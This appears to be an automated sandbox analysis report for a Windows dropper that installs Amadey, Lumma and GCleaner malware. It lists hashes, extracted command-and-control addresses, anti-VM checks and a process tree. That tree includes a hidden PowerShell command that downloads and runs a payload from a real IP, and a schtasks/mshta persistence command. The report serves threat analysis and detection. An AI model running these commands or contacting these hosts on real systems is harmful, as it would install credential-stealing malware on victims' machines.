Analysis
-
max time kernel
143s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
04/04/2025, 08:52
Static task
static1
General
-
Target
random.exe
-
Size
5.4MB
-
MD5
287364d198a535e3fd3643d55e38055c
-
SHA1
4c252add7ca1d05b4c204e5f43c5c1c52bbb9194
-
SHA256
e682c8222f3a68109482061e9591a307512e2cf9c1149ce771eb2f89898b3a6c
-
SHA512
91e9e98aa1269d692b0601402d5bbfcc6d47533a7a9fd7e334fcbeecca54b36d0ac6f45df7717fb865527b165d2eb45572263395977ca84f83c4417b3599849b
-
SSDEEP
98304:MGK6dLZWrN5EXrwW+Hytgc7yGuSKvy659q2c0cJ6ChSoNRzqB0ARkP9Xk:lxZWrXEXr5+StgcGGuLvy6f00cRNwuA
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://pirtyoffensiz.bet/api
https://luncertainyelemz.bet/api
https://hobbyedsmoker.live/api
https://dsfljsdfjewf.info/api
https://gdeaddereaste.today/api
https://subawhipnator.life/api
https://fprivileggoe.live/api
https://decreaserid.world/api
https://pastedeputten.life/api
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://advennture.top/GKsiio
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Extracted
gcleaner
185.156.73.98
45.91.200.135
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 90838c1b51.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 28a45e52b0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1U31H7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2p7021.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 69 4676 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4676 powershell.exe -
Downloads MZ/PE file 6 IoCs
flow pid Process 56 4092 rapes.exe 56 4092 rapes.exe 56 4092 rapes.exe 107 2088 svchost015.exe 108 2232 svchost015.exe 69 4676 powershell.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 28a45e52b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1U31H7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 90838c1b51.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1U31H7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2p7021.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 28a45e52b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2p7021.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 90838c1b51.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 1U31H7.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 17 IoCs
pid Process 4796 L6I13.exe 3360 1U31H7.exe 4092 rapes.exe 4176 2p7021.exe 4232 113222d33b.exe 448 V8LkpDo.exe 4104 V8LkpDo.exe 968 2da9f8d79e.exe 1556 735faf761a.exe 1576 Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE 2020 90838c1b51.exe 976 rapes.exe 2284 9fc8ad210e.exe 2088 svchost015.exe 1564 28a45e52b0.exe 2232 svchost015.exe 3968 rapes.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 28a45e52b0.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 1U31H7.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 2p7021.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 90838c1b51.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" random.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" L6I13.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000700000002421b-100.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 3360 1U31H7.exe 4092 rapes.exe 4176 2p7021.exe 1576 Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE 2020 90838c1b51.exe 976 rapes.exe 1564 28a45e52b0.exe 3968 rapes.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2284 set thread context of 2088 2284 9fc8ad210e.exe 133 PID 1564 set thread context of 2232 1564 28a45e52b0.exe 135 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 1U31H7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language L6I13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1U31H7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 735faf761a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 90838c1b51.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9fc8ad210e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 28a45e52b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2p7021.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 113222d33b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2172 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 3360 1U31H7.exe 3360 1U31H7.exe 4092 rapes.exe 4092 rapes.exe 4176 2p7021.exe 4176 2p7021.exe 4232 113222d33b.exe 4232 113222d33b.exe 4232 113222d33b.exe 4232 113222d33b.exe 4676 powershell.exe 4676 powershell.exe 4676 powershell.exe 1576 Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE 1576 Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE 2020 90838c1b51.exe 2020 90838c1b51.exe 2020 90838c1b51.exe 2020 90838c1b51.exe 2020 90838c1b51.exe 2020 90838c1b51.exe 976 rapes.exe 976 rapes.exe 1564 28a45e52b0.exe 1564 28a45e52b0.exe 3968 rapes.exe 3968 rapes.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4676 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1556 735faf761a.exe 1556 735faf761a.exe 1556 735faf761a.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1556 735faf761a.exe 1556 735faf761a.exe 1556 735faf761a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4636 wrote to memory of 4796 4636 random.exe 88 PID 4636 wrote to memory of 4796 4636 random.exe 88 PID 4636 wrote to memory of 4796 4636 random.exe 88 PID 220 wrote to memory of 4928 220 cmd.exe 89 PID 220 wrote to memory of 4928 220 cmd.exe 89 PID 4796 wrote to memory of 3360 4796 L6I13.exe 92 PID 4796 wrote to memory of 3360 4796 L6I13.exe 92 PID 4796 wrote to memory of 3360 4796 L6I13.exe 92 PID 4752 wrote to memory of 1876 4752 cmd.exe 93 PID 4752 wrote to memory of 1876 4752 cmd.exe 93 PID 3360 wrote to memory of 4092 3360 1U31H7.exe 97 PID 3360 wrote to memory of 4092 3360 1U31H7.exe 97 PID 3360 wrote to memory of 4092 3360 1U31H7.exe 97 PID 4796 wrote to memory of 4176 4796 L6I13.exe 98 PID 4796 wrote to memory of 4176 4796 L6I13.exe 98 PID 4796 wrote to memory of 4176 4796 L6I13.exe 98 PID 4092 wrote to memory of 4232 4092 rapes.exe 105 PID 4092 wrote to memory of 4232 4092 rapes.exe 105 PID 4092 wrote to memory of 4232 4092 rapes.exe 105 PID 4092 wrote to memory of 448 4092 rapes.exe 108 PID 4092 wrote to memory of 448 4092 rapes.exe 108 PID 4092 wrote to memory of 4104 4092 rapes.exe 110 PID 4092 wrote to memory of 4104 4092 rapes.exe 110 PID 4092 wrote to memory of 968 4092 rapes.exe 112 PID 4092 wrote to memory of 968 4092 rapes.exe 112 PID 4092 wrote to memory of 1556 4092 rapes.exe 114 PID 4092 wrote to memory of 1556 4092 rapes.exe 114 PID 4092 wrote to memory of 1556 4092 rapes.exe 114 PID 1556 wrote to memory of 1508 1556 735faf761a.exe 115 PID 1556 wrote to memory of 1508 1556 735faf761a.exe 115 PID 1556 wrote to memory of 1508 1556 735faf761a.exe 115 PID 1556 wrote to memory of 4864 1556 735faf761a.exe 116 PID 1556 wrote to memory of 4864 1556 735faf761a.exe 116 PID 1556 wrote to memory of 4864 1556 735faf761a.exe 116 PID 1508 wrote to memory of 2172 1508 cmd.exe 118 PID 1508 wrote to memory of 2172 1508 cmd.exe 118 PID 1508 wrote to memory of 2172 1508 cmd.exe 118 PID 4864 wrote to memory of 4676 4864 mshta.exe 119 PID 4864 wrote to memory of 4676 4864 mshta.exe 119 PID 4864 wrote to memory of 4676 4864 mshta.exe 119 PID 4676 wrote to memory of 1576 4676 powershell.exe 122 PID 4676 wrote to memory of 1576 4676 powershell.exe 122 PID 4676 wrote to memory of 1576 4676 powershell.exe 122 PID 4092 wrote to memory of 2020 4092 rapes.exe 126 PID 4092 wrote to memory of 2020 4092 rapes.exe 126 PID 4092 wrote to memory of 2020 4092 rapes.exe 126 PID 4092 wrote to memory of 2284 4092 rapes.exe 132 PID 4092 wrote to memory of 2284 4092 rapes.exe 132 PID 4092 wrote to memory of 2284 4092 rapes.exe 132 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 2284 wrote to memory of 2088 2284 9fc8ad210e.exe 133 PID 4092 wrote to memory of 1564 4092 rapes.exe 134 PID 4092 wrote to memory of 1564 4092 rapes.exe 134 PID 4092 wrote to memory of 1564 4092 rapes.exe 134 PID 1564 wrote to memory of 2232 1564 28a45e52b0.exe 135 PID 1564 wrote to memory of 2232 1564 28a45e52b0.exe 135 PID 1564 wrote to memory of 2232 1564 28a45e52b0.exe 135
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\L6I13.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\L6I13.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1U31H7.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1U31H7.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Users\Admin\AppData\Local\Temp\10444620101\113222d33b.exe"C:\Users\Admin\AppData\Local\Temp\10444620101\113222d33b.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4232
-
-
C:\Users\Admin\AppData\Local\Temp\10444630101\V8LkpDo.exe"C:\Users\Admin\AppData\Local\Temp\10444630101\V8LkpDo.exe"5⤵
- Executes dropped EXE
PID:448
-
-
C:\Users\Admin\AppData\Local\Temp\10444640101\V8LkpDo.exe"C:\Users\Admin\AppData\Local\Temp\10444640101\V8LkpDo.exe"5⤵
- Executes dropped EXE
PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\10444650101\2da9f8d79e.exe"C:\Users\Admin\AppData\Local\Temp\10444650101\2da9f8d79e.exe"5⤵
- Executes dropped EXE
PID:968
-
-
C:\Users\Admin\AppData\Local\Temp\10444660101\735faf761a.exe"C:\Users\Admin\AppData\Local\Temp\10444660101\735faf761a.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn c0z42ma1TuQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\vDfFxJpGk.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn c0z42ma1TuQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\vDfFxJpGk.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2172
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\vDfFxJpGk.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Users\Admin\AppData\Local\Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE"C:\Users\Admin\AppData\Local\Temp2WTJ2JWIZUN6FPHI0NHCCXSTNBEVBTDN.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1576
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444670101\90838c1b51.exe"C:\Users\Admin\AppData\Local\Temp\10444670101\90838c1b51.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\10444680101\9fc8ad210e.exe"C:\Users\Admin\AppData\Local\Temp\10444680101\9fc8ad210e.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10444680101\9fc8ad210e.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2088
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444690101\28a45e52b0.exe"C:\Users\Admin\AppData\Local\Temp\10444690101\28a45e52b0.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10444690101\28a45e52b0.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2232
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2p7021.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2p7021.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"2⤵PID:4928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"2⤵PID:1876
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:976
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3968
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
3.0MB
MD591f372706c6f741476ee0dac49693596
SHA18e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d
SHA2569a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781
SHA51288b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed
-
Filesize
1.8MB
MD5a616c70b521871a888c297266c93e4dc
SHA19c155bfcc1f54ad43feea0a5c03fc9d1b6529b7a
SHA256788c57b940278eb945aec7589626e9282741922a6bf31769ab5beb4427a83eff
SHA5129be0945d78d314e96e3b0d62ebe448e14650a9620bc9ba70df9c4d359f1302abcf28a1d553515bbfbc9f147041161a75b99742765cf7776f19a69ecd6989b662
-
Filesize
716KB
MD557a5e092cf652a8d2579752b0b683f9a
SHA16aad447f87ab12c73411dec5f34149034c3027fc
SHA25629054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34
SHA5125759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f
-
Filesize
358KB
MD5e604fe68e20a0540ee70bb4bd2d897d0
SHA100a4d755d8028dbe2867789898b1736f0b17b31c
SHA2566262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361
SHA512996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89
-
Filesize
8.0MB
MD57b53eb00bf22b994fa8b48428e370c22
SHA135bf0858a1dd9953aff51838f71e3211c0cf39b3
SHA256e47b6840a986f6ace12c353048ec996b3669987687f77c8b7dd9adf53575601b
SHA512841d0504f055a5b93a9a690b09e9b0d05ad09b57ee30c620b81677fc26fd09eeb8a6396a5e1c198efb8b6eefd63ece7430f980bcbcd3bdd8c531912d1283d33f
-
Filesize
1.4MB
MD5f3f9535109155498021e63c23197285f
SHA1cf2198f27d4d8d4857a668fa174d4753e2aa1dca
SHA2561ec54b5a3d71165f456a6e441bd7d6d85500973f953b9d6388c1c24a35cc449f
SHA512a05607b2d128055117877682f05b5abf1777addcb79debdac812cbc78cbef56ca87abca463b6fa96679172f580fd1603e7e470b7484248a3cdde0c0bc3124755
-
Filesize
730KB
MD531aeed8d880e1c68a97f0d8739a5df8a
SHA1d6f140d63956bc260639ab3c80f12a0e9b010ee9
SHA256bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97
SHA512bacbe9af92bf8f2adb7997d6db2f8a8fe833dbcef5af0cc465f6e41c2f409019b740c82f4b587d60ce1446f9cf10ebcb638bdf8d5fe05c7e8e8c518b747b6748
-
Filesize
938KB
MD5a798a2631ae2bc2f61b80ce937c75c65
SHA1f718fd2971eb1c17f0c1b7940c00e2e8ff18bcc2
SHA2563d3acb05b2a067b5bd9f7561320c2a61a23344c8f3cb78ac429b4e22b9f955b6
SHA5122d55ef28fe438b20f1a7122ecd8002ce4e7e57006eebec290693b4be923c11ea82b58c90b9028cb103af4e2f15617e1b6a3dca7d6abce501f96121d7eb920daf
-
Filesize
1.8MB
MD515c8b2c9850ae1e61fefc93fa7d68420
SHA1c5ae1454178293c4b26934572a8189bc5bb19798
SHA256835795ba6a18c56ddc56f0fad120d0a6f4ce47a55f8b9f29c59692e3965285f0
SHA512faaaf9dd1a9bdf77e76c6faa3d305d071289e280922b37ec6742c21642a05edf15cfb57663319e425755a62793446944b6b16c5eb1328c1567d5bad4fa0579e4
-
Filesize
5.9MB
MD5e05432c13d42b8526ce4bc0dc240d297
SHA1db6e9382425055030662ecdc95d6405d30dcf82a
SHA256574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9
SHA51256ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee
-
Filesize
4.3MB
MD51fb7beea8967c3ce15e72e9a8d14dc28
SHA1e2354deb9e8e84f7915bbad85fc934df8330557c
SHA25656208f729c6b9895dd87a0f120972a8b48320b247b4f668f6ef9f483044d3e48
